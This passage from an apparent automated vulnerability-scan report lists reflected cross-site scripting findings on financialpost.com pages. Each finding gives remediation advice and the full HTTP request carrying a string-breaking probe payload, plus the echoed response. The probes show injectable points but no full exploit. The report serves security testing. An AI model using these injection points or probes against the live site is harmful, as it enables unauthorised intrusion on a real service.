<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/header/172af';120f40364cb/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=header;kw=172af';120f40364cb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=54429246?">
...[SNIP]...

1.113. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/sidebar/most-popular/iframed.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290f4'%3b344b87b1ee4 was submitted in the REST URL parameter 1. This input was echoed as 290f4';344b87b1ee4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes290f4'%3b344b87b1ee4/sidebar/most-popular/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:14 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43593


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes290f4';344b87b1ee4/sidebar/most-popular/iframed;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes290f4';344b87b1ee4;kw=sidebar;kw=most-popular;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+
...[SNIP]...

1.114. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/sidebar/most-popular/iframed.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 678d7'%3bfe2c818c345 was submitted in the REST URL parameter 2. This input was echoed as 678d7';fe2c818c345 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/sidebar678d7'%3bfe2c818c345/most-popular/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 39528


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/sidebar678d7';fe2c818c345/most-popular/iframed;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=sidebar678d7';fe2c818c345;kw=most-popular;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=646
...[SNIP]...

1.115. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/sidebar/most-popular/iframed.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61041'%3bebbe0febebf was submitted in the REST URL parameter 3. This input was echoed as 61041';ebbe0febebf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/sidebar/most-popular61041'%3bebbe0febebf/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:24 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43520


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/sidebar/most-popular61041';ebbe0febebf/iframed;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=sidebar;kw=most-popular61041';ebbe0febebf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37152752?">
...[SNIP]...

1.116. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/sidebar/most-popular/iframed.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba0cd'%3bffc5ac2518 was submitted in the REST URL parameter 4. This input was echoed as ba0cd';ffc5ac2518 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/sidebar/most-popular/ba0cd'%3bffc5ac2518 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:30 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43557


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/sidebar/most-popular/ba0cd';ffc5ac2518/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=sidebar;kw=most-popular;kw=ba0cd';ffc5ac2518;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34260287?">
...[SNIP]...

1.117. http://www.financialpost.com/js/account_s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /js/account_s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc773'%3b3d124b5b04 was submitted in the REST URL parameter 1. This input was echoed as bc773';3d124b5b04 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsbc773'%3b3d124b5b04/account_s_code.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:17 GMT
Date: Sun, 19 Dec 2010 03:03:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42992


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/jsbc773';3d124b5b04/account_s_code;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=jsbc773';3d124b5b04;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=96540571?">
...[SNIP]...

1.118. http://www.financialpost.com/js/account_s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /js/account_s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f01f'%3b33001376b97 was submitted in the REST URL parameter 2. This input was echoed as 6f01f';33001376b97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/6f01f'%3b33001376b97 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42957


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/js/6f01f';33001376b97/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=js;kw=6f01f';33001376b97;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95619046?">
...[SNIP]...

1.119. http://www.financialpost.com/js/local_s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /js/local_s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afcb6'%3b20b8654109d was submitted in the REST URL parameter 1. This input was echoed as afcb6';20b8654109d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsafcb6'%3b20b8654109d/local_s_code.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:20 GMT
Date: Sun, 19 Dec 2010 03:03:20 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42994


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/jsafcb6';20b8654109d/local_s_code;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=jsafcb6';20b8654109d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=27940247?">
...[SNIP]...

1.120. http://www.financialpost.com/js/local_s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /js/local_s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3904a'%3b66e2a69e5b6 was submitted in the REST URL parameter 2. This input was echoed as 3904a';66e2a69e5b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/3904a'%3b66e2a69e5b6 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:26 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42957


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/js/3904a';66e2a69e5b6/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=js;kw=3904a';66e2a69e5b6;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=53325349?">
...[SNIP]...

1.121. http://www.financialpost.com/magazine/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /magazine/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee474'%3b656ca213590 was submitted in the REST URL parameter 1. This input was echoed as ee474';656ca213590 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /magazineee474'%3b656ca213590/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43140


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/magazineee474';656ca213590/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=magazineee474';656ca213590;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=65991524?">
...[SNIP]...

1.122. http://www.financialpost.com/markets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799c0'%3b846cbcb660c was submitted in the REST URL parameter 1. This input was echoed as 799c0';846cbcb660c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets799c0'%3b846cbcb660c/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36302


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets799c0';846cbcb660c/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets799c0';846cbcb660c;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=49620621?">
...[SNIP]...

1.123. http://www.financialpost.com/markets/company/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89cb2'%3ba2a4a97ee03 was submitted in the REST URL parameter 1. This input was echoed as 89cb2';a2a4a97ee03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets89cb2'%3ba2a4a97ee03/company/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43332


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets89cb2';a2a4a97ee03/company/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets89cb2';a2a4a97ee03;kw=company;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13531203?">
...[SNIP]...

1.124. http://www.financialpost.com/markets/company/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9f6'%3b784d6ba2a9b was submitted in the REST URL parameter 2. This input was echoed as dd9f6';784d6ba2a9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/companydd9f6'%3b784d6ba2a9b/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43296


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/companydd9f6';784d6ba2a9b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=companydd9f6';784d6ba2a9b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=92645471?">
...[SNIP]...

1.125. http://www.financialpost.com/markets/company/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76a86'%3b18777c60d8e was submitted in the REST URL parameter 3. This input was echoed as 76a86';18777c60d8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/company/76a86'%3b18777c60d8e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
